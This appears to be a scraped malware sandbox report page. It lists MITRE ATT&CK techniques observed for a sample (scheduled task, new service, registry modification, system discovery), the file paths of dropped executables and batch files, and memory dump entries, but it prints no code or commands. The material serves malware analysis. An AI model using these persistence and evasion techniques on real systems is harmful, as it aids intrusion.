Privilege Escalation

Scheduled Task

1

T1053

New Service

1

T1050

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\66545a.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\66545a.exe

Download Submit
C:\Windows\cZDUg\Js.exe

Download Submit
C:\Windows\cZDUg\qdx.bat

Download Submit
C:\Windows\cZDUg\tqnkhe.exe

Download Submit
C:\Windows\cZDUg\tqnkhe.exe

Download Submit
C:\Windows\cZDUg\tscl.html

Download Submit
C:\Windows\end.bat

Download Submit
C:\Windows\end.bat

Download Submit
C:\Windows\end.bat

Download Submit
\Users\Admin\AppData\Local\Temp\66545a.exe

Download Submit
\Users\Admin\AppData\Local\Temp\66545a.exe

Download Submit
\Windows\cZDUg\Js.exe

Download Submit
\Windows\cZDUg\Js.exe

Download Submit
\Windows\cZDUg\tqnkhe.exe

Download Submit
\Windows\cZDUg\tqnkhe.exe

Download Submit
memory/300-25-0x0000000000000000-mapping.dmp

Download
memory/300-40-0x0000000000000000-mapping.dmp

Download
memory/524-51-0x0000000000000000-mapping.dmp

Download
memory/524-38-0x0000000000000000-mapping.dmp

Download
memory/528-4-0x0000000000000000-mapping.dmp

Download
memory/664-5-0x0000000005600000-0x0000000005611000-memory.dmp

Filesize
68KB

Download
memory/664-2-0x0000000000000000-mapping.dmp

Download
memory/664-6-0x0000000005A10000-0x0000000005A21000-memory.dmp

Filesize
68KB

Download
memory/692-28-0x0000000000000000-mapping.dmp

Download
memory/756-36-0x0000000000000000-mapping.dmp

Download
memory/832-23-0x0000000000000000-mapping.dmp

Download
memory/924-18-0x0000000000000000-mapping.dmp

Download
memory/984-29-0x0000000000000000-mapping.dmp

Download
memory/1044-44-0x0000000000000000-mapping.dmp

Download
memory/1064-48-0x0000000000000000-mapping.dmp

Download
memory/1116-33-0x0000000000000000-mapping.dmp

Download
memory/1116-59-0x0000000000000000-mapping.dmp

Download
memory/1224-37-0x0000000000000000-mapping.dmp

Download
memory/1224-49-0x0000000000000000-mapping.dmp

Download
memory/1344-39-0x0000000000000000-mapping.dmp

Download
memory/1352-32-0x0000000000000000-mapping.dmp

Download
memory/1376-43-0x0000000000000000-mapping.dmp

Download
memory/1468-30-0x0000000000000000-mapping.dmp

Download
memory/1504-16-0x0000000000000000-mapping.dmp

Download
memory/1520-22-0x0000000000000000-mapping.dmp

Download
memory/1556-56-0x0000000000000000-mapping.dmp

Download
memory/1564-14-0x0000000005A00000-0x0000000005A11000-memory.dmp

Filesize
68KB

Download
memory/1564-63-0x00000000087C0000-0x00000000087D1000-memory.dmp

Filesize
68KB

Download
memory/1564-62-0x00000000083B0000-0x00000000083C1000-memory.dmp

Filesize
68KB

Download
memory/1564-10-0x0000000000000000-mapping.dmp

Download
memory/1564-13-0x00000000055F0000-0x0000000005601000-memory.dmp

Filesize
68KB

Download
memory/1588-52-0x0000000000000000-mapping.dmp

Download
memory/1588-26-0x0000000000000000-mapping.dmp

Download
memory/1608-41-0x0000000000000000-mapping.dmp

Download
memory/1628-50-0x0000000000000000-mapping.dmp

Download
memory/1692-54-0x0000000000000000-mapping.dmp

Download
memory/1752-20-0x0000000000000000-mapping.dmp

Download
memory/1796-47-0x0000000000000000-mapping.dmp

Download
memory/1804-21-0x0000000000000000-mapping.dmp

Download
memory/1804-46-0x0000000000000000-mapping.dmp

Download
memory/1832-35-0x0000000000000000-mapping.dmp

Download
memory/1840-19-0x0000000000000000-mapping.dmp

Download
memory/1844-53-0x0000000000000000-mapping.dmp

Download
memory/1864-34-0x0000000000000000-mapping.dmp

Download
memory/1876-45-0x0000000000000000-mapping.dmp

Download
memory/1916-12-0x0000000000000000-mapping.dmp

Download
memory/1920-42-0x0000000000000000-mapping.dmp

Download
memory/1960-24-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads